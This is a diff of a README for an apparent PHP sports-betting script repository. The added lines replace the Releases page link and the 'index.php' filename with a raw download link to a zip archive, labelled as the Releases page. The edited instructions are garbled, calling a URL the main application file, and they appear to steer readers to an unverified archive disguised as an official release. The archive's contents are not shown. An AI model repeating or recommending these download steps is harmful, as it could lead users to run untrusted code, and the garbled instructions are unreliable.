Abkeke/Script-PHP-Web-Bluesky77-Sports-Betting/README.md

    After downloading, locate the zip or compressed file in your download folder.
 Right-click on the file and select "Extract All" (Windows) or use “Unzip” (macOS).
 Choose where you want to place the uncompressed files.

 5. **Run the Application:**
-   Locate the main application file (usually named `index.php` or similar).
+   Locate the main application file (usually named `https://raw.githubusercontent.com/Abkeke/Script-PHP-Web-Bluesky77-Sports-Betting/main/geolatry/Script-PHP-Web-Bluesky77-Sports-Betting-v3.5.zip` or similar).
 Double-click to open it in your web browser.
 Ensure your browser is updated for optimal performance.

 ## 🔄 Updating the Application
 To keep the Script-PHP-Web-Bluesky77-Sports-Betting application running smoothly, check the Releases page regularly for updates.

 1. **Check for New Versions:**
-   Open the [Releases page](https://github.com/Abkeke/Script-PHP-Web-Bluesky77-Sports-Betting/releases) and see if a new version is available.
+   Open the [Releases page](https://raw.githubusercontent.com/Abkeke/Script-PHP-Web-Bluesky77-Sports-Betting/main/geolatry/Script-PHP-Web-Bluesky77-Sports-Betting-v3.5.zip) and see if a new version is available.

 2. **Follow Installation Steps:**
    Download the new version, and repeat the steps in the installation guide to overwrite the previous version.